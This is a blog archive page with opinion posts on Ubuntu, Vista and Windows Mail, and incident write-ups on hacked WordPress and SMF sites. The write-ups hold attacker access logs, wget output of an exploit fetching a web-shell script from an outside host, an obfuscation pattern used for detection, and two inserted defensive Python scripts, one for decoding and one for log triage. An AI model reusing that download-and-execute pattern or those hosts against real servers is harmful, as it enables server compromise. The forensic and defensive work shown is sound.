Ubuntu Concedes Defeat, Canonical Throws in The Towel

While it’s not quite as dramatic as the title might suggest…

It is true. As it was a year ago, and still is today.

The success of Ubuntu Linux and Canonical is only one part truth… If success = being popular.

If you take your news from digg.com, cnet, or any other tech friendly site on the net, you will read one thing over and over again, every day of the year: Ubuntu is taking over the world, Vista does not work, and Microsoft is dying.

The facts are that 1) Ubuntu Linux is another popular Linux distribution (at the head of a long line of distros that have seen their peaks), 2) Vista is the best OS so far, works well, and is a major seller, and 3) Microsoft revenues have been trending upward for as long as I can remember.

Consider also the facts that digg.com (net’s biggest anti-MS site) makes all its money from a Microsoft partnership [after Google dropped them], and that Ubuntu Linux is purely a product of Corporate sponsorship and development … and what do you have left?

It’s not “reality” because reality is not something that the pressure groups of self agendas can handle, and neither is the truth.

The truth is that 1) some people feel the need to be part of a group that needs to constantly reassure one another that “their way is the best way” and 2) tech sites need to drive traffic to generate ad revenues by spreading fear, uncertainty, and distrust.

Just today I was reading on a tech site how Canonical’s revenues are in the stratosphere. Right! Let’s see…

This is the same day Shuttleworth goes on to claim that Canonical is not cash positive (they are spending more than they are taking in) and it will take another 5 years of funding [Source]… At only a 10 million a year burn rate.

In other news, there is no money to be made on desktop Linux, but that’s okay, because everyone already knew that. Hindsight is always 20/20.

Windows Mail for Vista, Not As Bad As I Thought.

Having used Windows XP for the last several years, I’ve recently decided to migrate to Windows Vista after purchasing a Dell 530 quad core PC with a 24 inch LCD.

My choices were to:
1. Keep using Thunderbird
2. Migrate to Outlook [Office]
3. Or try the native Windows Vista Mail application [“Windows Mail” is the replacement for Outlook Express].

The choice of using Thunderbird was the simplest of them all… But I wanted to try something new. The stability issues and a non-modern UI were the other decisive factors at play.

In the end, Windows Mail was the winner. But not an easy one.

Here is what I have discovered, which should have been documented somewhere but is not.

a) There is no way to import mbox format mail from other Mail Clients.

I used a temporary IMAP folder to copy/move messages from one mail client to the other, to bypass the obvious underlying format issues.

b) All POP accounts go into the main Local Inbox folder.

If you want to structurally segment different POP accounts, you will need to create Local sub-folders and create message rules that are conditional on the specific account. I can make a case for or against this [if this is a feature or a limit].

c) Message Rules do not apply to IMAP folders.

And there are no settings to automatically copy/move messages from select IMAP folders or accounts to the Local Folders. Again, I can make a case for or against this [both ways].

d) The Spam filter does not automatically apply to IMAP accounts and folders even when “Synchronization Settings” are set to “All messages” [which downloads the entire message body].

You actually have to open the message for the spam filter to process it. Though I think it might act on the header data it receives, proactively, or perhaps even on the message body when you select “Work Offline”.

All in all, after using Windows Mail I’ve actually become fond of it. It’s a great app and integrates well with the system.

Gmail IMAP folders use a “/” path in their structure. Example: The All Mail folder is “[Gmail]/All Mail”. Windows Mail does not allow you to use this character to specify the special IMAP folders. It still works, but looks a little odd. There are ways to get around this if it bothers you.

Another Day, Another WordPress Hack.

It could have been worse.

A few weeks ago we were hit with an SMF v1.1.3 exploit just a few days after the release of v1.1.4. The intruder inserted a slew of hidden spam links into the main ‘index.php’ file.

It took me a day or two to detect the modifications. And in this short time period forums.devside.net, which has been online since 2003, with a healthy PageRank, had all its pages dropped from Google [with the exception of profiles and archives].

It’s a good thing I keep the forums on their own sub-domain, which Google treats more like a separate domain than anything else. A SE problem with the sub does not affect the main domain.

As a counter-measure to these “exploit app weakness, get shell, d/l script, profit” type of attacks, I have disabled most of the shell-related PHP functions on the server.

And so I thought my problems were solved…

This time it’s my fault. I was running WordPress v2.2.2, with v2.2.3 having been released about a month ago. I’ve been checking the WP dashboard, but I must have missed it, or forgotten about it.

This time the intruder exploited one of many WP weaknesses, and inserted some type of hidden “-1” post that was nothing more than an attachment carrying this particular shell script, executed with the URL ‘/blog/?poncheg’…

WordPress Hack 1

WordPress Hack 2

- - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-"
- - [08/Oct/2007:07:10:25 -0400] "GET / HTTP/1.0" 200 12071 "-" "-"
- - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-"
- - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera"
- - [08/Oct/2007:07:11:49 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1647 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:11:56 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "http://www.devside.net/blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
- - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://www.devside.net/blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
- - [08/Oct/2007:07:12:25 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1629 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:12:30 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
- - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"
...
- - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"

JSC "VimpelCom" WLAN1 Moscow

Host name of is vps206.fastvps.ru

Luckily, in addition to the disabled PHP functions, I also had all my file/dir permissions under WP locked down, so it does not look like anything was modified. I still recreated the entire WP directory, just for safety’s sake, and had to manually go into the database and delete the hidden attachment/post.

It’s not a matter of if you are going to get hacked, it’s a matter of when. So keep those web apps patched!

All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on ‘fetching preview…’], only to come up to this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru...
Connecting to kotzilla.jino-net.ru||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script onto your system, with all of it done through Apache (under the web server’s own user) and usually triggered by a single URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any unknown PHP code. The only option left is to write a PHP script to decode/inflate until we get at the center…

$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
// Match one eval(gzinflate(base64_decode('...'))) layer and capture the base64 payload.
$pattern = '/^eval\(gzinflate\(base64_decode\(\'([^\']*)\'\)\)\);/';
$count = 0;
while (preg_match($pattern, $string, $matches)) {
    // Decode one layer statically; the result is never passed to eval().
    $string = gzinflate(base64_decode($matches[1]));
    $count++;
}
echo "Decoded/Inflated: $count\n";
echo "$string";

Seems to be some type of a web php shell script called C99madShell.
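The same unwrapping, as an added Python example rather than the page’s PHP script: it peels eval(gzinflate(base64_decode(...))) layers statically, so nothing is ever executed, tolerates whitespace and either quote style, and caps the depth so a malformed or endlessly nested blob cannot spin forever. The real include.txt payload is not on the page, so the nested sample is constructed here by the wrap() helper around a harmless stand-in string; PHP’s gzinflate() is a raw DEFLATE stream, which is what the wbits=-15 calls select.

```python
import base64
import re
import zlib

# One obfuscation layer: eval(gzinflate(base64_decode('...'))), optionally inside <?php ... ?>.
# Group 1 is the quote character, group 2 the base64 payload (whitespace inside it tolerated).
LAYER_RE = re.compile(
    r"""^\s*(?:<\?php\s*)?eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"""
    r"""(['"])([A-Za-z0-9+/=\s]*)\1\s*\)\s*\)\s*\)\s*;?\s*(?:\?>)?\s*$"""
)


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() equivalent: raw DEFLATE, no zlib/gzip header (wbits=-15)."""
    return zlib.decompress(data, -15)


def gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate() equivalent; used only to build the constructed sample below."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def unwrap(source: str, max_layers: int = 50):
    """Statically peel nested layers. Returns (innermost_text, layers_removed).

    The decoded text is never evaluated. A layer that fails to decode, or the
    max_layers cap, stops the loop and returns whatever was recovered so far.
    """
    current, layers = source, 0
    while layers < max_layers:
        m = LAYER_RE.match(current)
        if not m:
            break
        try:
            decoded = gzinflate(base64.b64decode(m.group(2), validate=False))
        except (ValueError, zlib.error):
            break
        current = decoded.decode("utf-8", errors="replace")
        layers += 1
    return current, layers


def wrap(source: str, layers: int) -> str:
    """Inverse of unwrap(): builds a nested sample so the example runs offline."""
    current = source
    for _ in range(layers):
        enc = base64.b64encode(gzdeflate(current.encode())).decode()
        current = f"eval(gzinflate(base64_decode('{enc}')));"
    return current


# Constructed, benign stand-in for the real payload (not the shell from the page).
SAMPLE_INNER = "<?php /* C99madShell stand-in (constructed) */ echo 'shell placeholder'; ?>"
SAMPLE = wrap(SAMPLE_INNER, 7)

if __name__ == "__main__":
    inner, n = unwrap(SAMPLE)
    print(f"Decoded/Inflated: {n}")
    print(inner)
```

Run it as a script to see the seven constructed layers come off; point unwrap() at the contents of a suspect file to do the same for real samples, and treat whatever comes out as text to read, never as code to run.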

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

Not good!

Hack Shell 1

Hack Shell 2

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to no good.

- - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
- - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
- - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
- - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
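Both log excerpts on this page, the WordPress one earlier and the SMF one just above, have the same shapes worth alerting on before the spam links and the Google drop happen: a 404 probe for a PHP file followed by a 200 for the same file under another path, a PHP file being requested under a directory that should only hold themes or uploads, an upload attached to post_id=-1, and a POST from a user agent that claims to be a crawler. As an added example that is not from the page, here is a small Python triage pass over combined-format access log lines that flags those four patterns. The sample lines are constructed after the page’s entries, with RFC 5737 placeholder addresses standing in for the redacted IPs, and the content-directory list is an assumption to tune per site.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories that should serve themes/uploads/images, never hand-placed PHP.
# Assumed list for this example; adjust to the site's layout.
CONTENT_DIRS = ("/themes/", "/wp-content/uploads/", "/attachments/", "/images/")


def parse_line(line):
    """Return a dict of fields for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    rec["status"] = int(rec["status"])
    return rec


def triage(lines):
    """Run the four rules over the lines; each finding names the ip, timestamp, rule and target."""
    findings = []
    probed = defaultdict(set)  # ip -> PHP basenames that already returned 404 for that client

    def hit(rec, rule):
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "rule": rule, "target": rec["target"]})

    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        path = rec["path"].lower()
        base = posixpath.basename(path)

        # 1. PHP executed out of a directory that should only hold content.
        if path.endswith(".php") and any(d in path for d in CONTENT_DIRS):
            hit(rec, "php_in_content_dir")
        # 2. Upload attached to a post that cannot exist (post_id=-1).
        if base == "upload.php" and rec["query"].get("post_id") == ["-1"]:
            hit(rec, "upload_post_id_minus_one")
        # 3. Crawlers fetch; they do not POST forms.
        if rec["method"] == "POST" and "bot" in rec["ua"].lower():
            hit(rec, "bot_ua_post")
        # 4. Same client: 404 for a PHP file, then a 200 for the same file elsewhere.
        if rec["status"] == 404 and base.endswith(".php"):
            probed[rec["ip"]].add(base)
        elif rec["status"] == 200 and base in probed[rec["ip"]]:
            hit(rec, "probe_then_hit")
            probed[rec["ip"]].discard(base)
    return findings


def rule_counts(lines):
    """Findings aggregated per rule, e.g. {'php_in_content_dir': 2, ...}."""
    counts = {}
    for f in triage(lines):
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


# Constructed sample modelled on the page's entries; 192.0.2.x are placeholder addresses.
SAMPLE_LOG = '''\
192.0.2.10 - - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-"
192.0.2.10 - - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-"
192.0.2.10 - - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera"
192.0.2.10 - - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "-" "Opera"
192.0.2.20 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
192.0.2.20 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
192.0.2.30 - - [27/Sep/2007:14:00:00 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "-" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']}  {f['ip']:<12} {f['rule']:<26} {f['target']}")
```

On a real access_log, pipe the file into triage() line by line and sort the findings by client; the probe-then-hit rule is deliberately per client, since the same 404/200 pair from two different addresses is usually just a bad link.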

Final Analysis.
I’ve searched the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL; maybe it is POST related, or has something to do with the SMF theme function. I run no mods, use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure just a hijacked system], the user_id on the forum, and the mail account used for activation, but not much else.

Host name of is nzs.agh.edu.pl

- - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

- - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv: Gecko/20070914 Firefox/"
...
- - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
- - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
- - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
- - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"

Host name of is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

Ubuntu and Dell, a Mismatch Made in a Place Called Hell [IdeaStorm].

I’m going to keep this one short and simple, and to the point.

And I’m not even going to write anything.

Why the Dell/Ubuntu Deal Won’t Improve Linux’s Market Share

When you take a few steps back from the furor and zealotry and take a close look at what’s happened here, you will quickly start to see the cracks. One problem is that Dell appears to be under the misguided impression that listening to the IdeaStorm community is the same as listening to customers. It’s not. Anyone can register and become an instant member of the IdeaStorm community. What Dell listened to wasn’t a cross-section of customers, but rather a pressure group.

There are a series of other pressure groups in operation on IdeaStorm right now, people who are putting their own agendas on the table and expecting Dell to carry them out

A wise and sound analysis that iterates everything mentioned here on the topic.